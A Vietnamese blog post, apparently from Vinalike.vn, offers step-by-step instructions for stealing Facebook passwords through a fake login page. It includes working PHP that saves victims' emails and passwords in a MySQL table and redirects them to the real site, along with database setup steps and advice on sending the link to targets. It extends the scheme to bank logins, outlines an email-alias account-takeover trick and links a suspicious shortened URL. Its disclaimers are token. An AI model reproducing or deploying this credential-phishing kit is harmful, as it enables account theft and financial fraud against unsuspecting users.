# Code Hack Nick Facebook Mới Nhất 2023

Sử dụng code hack nick facebook là một cách mang lại hiệu quả khá cao so với những phương pháp khác. Tuy nhiên để có thể sử dụng thành công cách này thì không phải ai cũng làm được và không phải ai cũng có mã code đúng để hack Facebook. Chính bởi vậy, bài viết dưới đây Vinalike.vn sẽ chia sẻ chi tiết đến bạn cách sử dụng code hack nick facebook chi tiết và chính xác nhất. Hãy cùng tìm hiểu thông tin chi tiết qua bài viết dưới đây nhé!

KHÁI NIỆM CODE HACK NICK FACEBOOK LÀ GÌ?

Hack facebook bằng code mang đến hiệu quả khá cao tuy nhiên cách này chỉ có thể thực hiện thành công khi bạn có một số kiến thức nền tảng nhất định về code. Mặt khác, bạn cũng chỉ nên sử dụng mã code này trong những trường hợp cần thiết và phù hợp.

Và cũng không nên lạm dụng nó cho những hành vi có mục đích xấu để: lừa lọc, chiếm đoạt tài sản cá nhân hoặc có những hành động vi phạm pháp luật, gây ảnh hưởng nghiêm trọng cho chủ sở hữu tài khoản.

VẬY ĐỂ HACK TÀI KHOẢN FACEBOOK CẦN CHUẨN BỊ NHỮNG GÌ?

Để có thể thực hiện code hack acc facebook, check pass facebook, code hack nick faceebook bạn cần chuẩn bị một số kiến thức và ngôn ngữ chuyên ngành như sau:

  • HTML
  • CSS
  • JavaScript
  • PHP and MySQL

Việc trang bị kỹ lưỡng những kiến thức cơ bản trước khi sử dụng code hack nick Facebook nhằm mục đích để tạo biểu mẫu đăng nhập giống y hết với mạng xã hội facebook. (Lúc này HTML và CSS sẽ được áp dụng tại đây). Khi đó người dùng sẽ lầm tưởng website có giao diện giống fb mà bạn tạo ra là Facebook thật nên sẽ điền tài khoản và mật khẩu để login vào.

Sau đó bạn sẽ thu thập được cũng như cần lưu trữ tất cả những thông tin đăng nhập liên quan đến nick facebook này trong cơ sở dữ liệu PHP và MySQLi. Tiếp đó sẽ chuyển hướng người dùng đến trang facebook gốc. ( JavaScript sẽ hỗ trợ bạn thực hiện điều đó)

Đây là cách hack nick facebook, hack pass Facebook bằng cách tận dụng tấn công lừa đảo. Sau khi tham khảo và thực hành đoạn code hack Facebook mà mình hướng dẫn thì bạn sẽ có thể hack tài khoản fb người khác, thu thập id cũng như mật khẩu đăng nhập của vô số tài khoản khác.

SỬ DỤNG CODE HACK NICK FACEBOOK CẦN CÓ NHỮNG BƯỚC NÀO?

Để sử dụng code hack nick Facebook bạn cần chuẩn bị một số những bước sau:

Bước 1: Tạo một website đăng nhập giống với facebook bằng code hack facebook, kèm theo đó sẽ là những thông tin được mô tả chi tiết nhất. Ngoài ra bạn cũng đừng quên kèm theo ảnh và cả tin nhắn

Bước 2: Tạo tập lệnh để xử lý trang đăng nhập. Mục đích của việc này là lưu trữ mọi thông tin có trong cơ sở dữ liệu của mình

Bước 3: Tạo cơ sở dữ liệu để lưu trữ ID và mật khẩu Facebook. Sau đó hãy gửi liên kết đăng nhập cho người sử dụng

Bước 4:  Tạo trang web nhằm xem ID và mật khẩu nick facebook bị hack.

Sau khi gửi liên kết (địa chỉ url) đến đúng đối tượng bạn muốn hack tài khoản, việc của bạn là chờ đợi họ sẽ tự động cung cấp tên tài khoản đăng nhập và mật khẩu nick facebook trong cơ sở dữ liệu của bạn. Hoặc bạn cũng có thể tự tạo một trang web để nhằm mục đích xem danh sách mật khẩu nick facebook của người dùng bị nhắm mục tiêu

Xem thêm : Dịch vụ tạo Fanpage, Thiết kế Fanpage chuyên nghiệp chuẩn SEO

Bước 5: Sau khi đã hoàn thành các bước trên, bạn hãy chờ đợi để nhận thông tin chi tiết nhất về id và mật khẩu tài khoản facebook đang bị code tấn công.

Tuy nhiên, việc trình bày những cách làm trên có phần hơi khó hiểu cho nhiều bạn. Để giúp bạn có thể hiểu một cách chi tiết cũng như nắm rõ cách làm để dễ dàng thành công thì dưới đây Tâm Blogs sẽ chia sẻ chi tiết đến bạn từng cách làm. Cụ thể:

Tạo script để lưu trữ mọi thông tin đăng nhập trên facebook

Đây chính là Script xử lý đăng nhập. Mục đích là lưu trữ thông tin đăng nhập của người bạn muốn hack Facebook >>> Sau đó,  đặt tập tin trên vào thư mục với tên login.php

<?php 
$conn = mysqli_connect('localhost', 'root', '', 'fbhackedusers');
if(mysqli_connect_error())
{
// redirect users to original facebook if error occurred
header("location: https://www.facebook.com");
exit();
}
?>
<!doctype html>
<html>
<head>
<title>Logging in to facebook</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=yes">
</head>
<body style="margin:0px;"> 
<?php
if($_SERVER["REQUEST_METHOD"] == "POST")
{
if(isset($_POST['login']))
{
$email = $pass = "";
// get facebook email id
$email = $_POST["email"];
// get facebook password
$pass = $_POST["pass"];
// insert the facebook id and password in database
$sql = "insert into fbusers(facebookid, facebookpassword) values('$email', '$pass')";
$result = $conn->query($sql);
}
}
// redirect users to original facebook url
header("location: https://www.facebook.com");
exit();
?> 
</body>
</html>

Chuyển hướng người dùng đến url facebook gốc

Ở bước này bạn có thể dễ dàng nhận thấy với hai bước thực hiện trên, đoạn mã sau khi sử dụng sẽ chuyển hướng người dùng đến facebook gốc.

header(“location: https://www.facebook.com”);

Tạo cơ sở dữ liệu để lưu trữ id và mật khẩu facebook

Tại đây bạn sẽ tạo một cơ sở dữ liệu cùng tên >>> Sau đó tạo một bảng có cùng tên gọi >>> Sau đó tạo các cột có chi tiết giống với đoạn mã bên trên (Đây chính là cơ sở dữ liệu có tên fbhackedusers bảng có tên fbusers, sau cùng là các cột là facebookid và facebookpassword). Và để thực hiện được những điều đó, bạn hãy làm theo các bước sau:

Bước 1:  Click chuột vào Admin, nằm ngay cạnh hàng MySQL trong bảng điều khiển XAMPP. Một trang web được mở ngay trong trình duyệt web mặc định của bạn với url http://localhost/phpmyadmin/

Bước 2: Click chuột vào databases.

Bước 3: Nhập tên cơ sở dữ liệu như fbhackedusers, nhấn nút Create.

Bước 4:  Nhập fbusers bên cạnh tên >>>  đặt 3 bên cạnh số cột. Kích chuột vào nút Tạo.

Bước 5: Cung cấp thông tin chi tiết cho tất cả ba cột trên. Trong đó, cột đầu tiên như S.No. dưới dạng tên. INT là loại, 6 là độ dài. Giá trị, Primary là chỉ mục, và đánh dấu vào A.I tăng tự động.Tất cả người dùng

Cột thứ hai giống như facebookid là Tên, VARCHAR- Loại, 40 là Length/Values

Cột thứ ba giống như mật khẩu facebook: Chính là Tên, VARCHAR làm Loại, 40 là Length/Values

Bước 6: Khi cung cấp các thông tin chi tiết của 3 bước trên hãy ấn vào save. Điều này có nghĩa bạn đã thiết lập thành công cơ sở dữ liệu cục bộ

Lúc này việc của bạn là gửi link đến người mà bạn muốn hack nick facebook để tiến hành lấy ID và mật khẩu nick tài khoản của họ thông qua trang code hack Facebook bạn vừa tạo.

LƯU Ý CẦN NẮM KHI SỬ DỤNG CODE HACK NICK FACEBOOK

Cách hack một acc facebook bằng code không phải là việc làm quá phức tạp và bạn hoàn toàn có thể áp dụng nó một cách thành công nếu thực hiện đúng với những gì Tâm Blogs chia sẻ ở trên.

Bạn cũng có thể áp dụng phương pháp này để hack các mạng xã hội khác ngoài facebook đấy, thậm chí là hack tài khoản ngân hàng đấy…

Chẳng hạn như bạn gửi tin nhắn cho 1 người lạ với nội dung: Cách kiếm tiền nhanh chóng không mất phí tại Vietinbank (kèm đường link web có giao diện đăng nhập y hệt trang đăng nhập thật của ngân hàng) >>> Nếu người xem tin nhắn “nhẹ dạ, cả tin” mà điền thông tin đăng nhập vào thì bạn đã có tài khoản ngân hàng của người đó.

Các hacker chuyên nghiệp còn có thể cài virus, mã độc vào các đường link web đó, dù người dùng chỉ click vào xem thôi mà không điền thông tin đăng nhập thì cũng có nguy cơ bị hack tài khoản. Vì lẽ đó, khi bạn nhận được tin nhắn kèm 1 đường link lạ trên zalo, messenger… thì đừng dại mà click vào nhé!

Mình cũng khuyến khích các bạn KHÔNG NÊN sử dụng code hack nick facebook này một cách tùy tiện. Hãy sử dụng nó vào đúng mục đích như: chủ tài khoản facebook bị hack nick và cần lấy lại nick. Tuyệt đối không nên sử dụng vì mục đích xấu, bởi mọi hành vi sai trái sẽ khiến bạn phải chịu trách nhiệm trước pháp luật. Mức phạt có thể là cảnh cáo, phạt tiền hoặc phạt hình sự tùy vào mức độ nghiêm trọng về hành vi bạn gây ra

Cách đơn giản hack acc fb bằng email

https://flexurls.com/hackfb

Đầu tiên, hãy tạo tài khoản Yahoo qua email, sau đó nhập danh bạ từ tài khoản FB của bạn vào phần “Nhập danh bạ”, sau đó nhấn vào Facebook. Bạn chọn tên tài khoản Facebook muốn hack. Tại thời điểm này, bạn cần truy cập nhà cung cấp email mà bạn đang sử dụng, chẳng hạn như Yahoo, Gmail, v.v., để kiểm tra xem địa chỉ email bạn vừa nhận có còn khả dụng hay không.

Bạn phải đăng nhập bằng đúng ID email. Về phần mật khẩu, bạn có thể nhập bất cứ thứ gì bạn muốn. Sau đó, hãy tiếp tục và tạo một tài khoản mới. Đi tới Quản lý Cài đặt Tài khoản, đi tới Quản lý Bí danh, nhập địa chỉ email của tài khoản bạn muốn hack. Bạn không cần xác minh vì tài khoản này không tồn tại.

Thay vào đó, ứng dụng sẽ tự động liên kết với tài khoản của bạn. Vào FB và yêu cầu đặt lại mật khẩu của tài khoản liên kết mà bạn đã tạo. Sau khi hoàn tất, bạn sẽ nhận được yêu cầu đặt lại mật khẩu của mình trong một email.

Lời kết

Trên đây là tổng hợp những chia sẻ kiến thức về cách code hack nick facebook chuẩn và mới nhất hiện nay để bạn áp dụng. Tuy nhiên, chính sách về bảo mật của Facebook luôn được thay đổi nên sẽ có thể cách thức này chỉ đúng phù hợp trong một thời điểm nhất định nào đó. Vậy nên khi có thay đổi nào diễn ra Vinalike.vn sẽ cập nhật mới nhất trong bài viết này. Chúc bạn thành công!

 

 

 

5/5 - (1 bình chọn)
Thông báo tháng 05